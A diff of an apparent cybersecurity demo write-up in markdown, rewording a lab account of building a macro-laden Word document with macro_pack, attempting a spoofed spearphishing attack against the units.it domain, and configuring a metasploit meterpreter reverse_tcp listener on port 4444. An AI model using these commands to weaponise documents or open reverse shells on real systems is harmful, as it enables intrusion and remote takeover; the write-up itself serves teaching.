EnricoPiccin02/Cybersecurity-Demo/home.md

     Document_Open
 End Sub
 ```
-To then inject this payload inside a Word document I use `macro_pack`, by running the following command:
+To inject this payload into a Word document, I used `macro_pack` by executing the following command:
 ```
 macro_pack.exe -f reverse_shell_exploit.vba -o -G malicious.docm
 ```
 ![Photo of Mountain](images/mountain.jpg)
-> **Note:** As stated by the author of this tool, a Windows platform with the right MS Office applications installed is required for Office documents automatic generation or trojan features, so I indeed needed to run the `macro_pack` command on an appropriate Windows VM (not previously mentioned for ease of global understanding).
+> **Note:** As stated by the author of this tool, a Windows platform with the right MS Office applications installed is required for Office documents automatic generation or trojan features.
+Therefore, I ran the `macro_pack` command on an appropriate Windows VM (not previously mentioned for clarity).

 <br/>

 ## Spearphishing
-Once the adversary generates the `malicious.docm` document, he needs to inject it into the victim's environment.
-I tried to perform a Spoofed Spearphishing Attack using [The Social-Engineer Toolkit (SET)](https://github.com/trustedsec/social-engineer-toolkit) and replicating the `units.it` domain using [hMailServer]( https://www.hmailserver.com), but there were compatibility issues as stated [here](https://github.com/trustedsec/social-engineer-toolkit/issues/810).<br/>
+Once the adversary generates the `malicious.docm` document, it must be injected into the victim’s environment.
+I attempted to execute a Spoofed Spearphishing Attack using [The Social-Engineer Toolkit (SET)](https://github.com/trustedsec/social-engineer-toolkit) and replicating the `units.it` domain using [hMailServer]( https://www.hmailserver.com).
+However, compatibility issues were encountered, as reported [here](https://github.com/trustedsec/social-engineer-toolkit/issues/810).<br/>
-Therefore I assumed that the adversary managed to acquire **Valid Credentials** for one **Domain Account** of the `units.it` domain (additional Threat Model), so to be able to send the required Spearphishing Attachment to the victim.
+Consequently, I postulated that the adversary successfully acquired **Valid Credentials** for one **Domain Account** of the `units.it` domain (an additional Threat Model), to enable the transmission of the requisite Spearphishing Attachment to the victim.

 ![Photo of Mountain](images/mountain.jpg)

 <br/>

 ## Initial Access & Execution
-In order to have a **reverse shell** at the victim's side connected to a remote shell client at the adversary's side, the attacker needs to launch a **listener** (prior to the opening of the `malicious.docm` document).<br/>
+To establish a **reverse shell** at the victim’s side connected to a remote shell client at the adversary’s side, the attacker must launch a **listener** prior to the opening of the `malicious.docm` document.<br/>
-To do so, I have created a handler configuration file for `metasploit`, namely `handler.rc`, to instruct it to listen at port `4444` for TCP connections:
+To accomplish this, I have created a handler configuration file for `metasploit`, namely `handler.rc`, to instruct it to listen at port `4444` for TCP connections:
 ```
 use exploit/multi/handler
 set payload windows/x64/meterpreter/reverse_tcp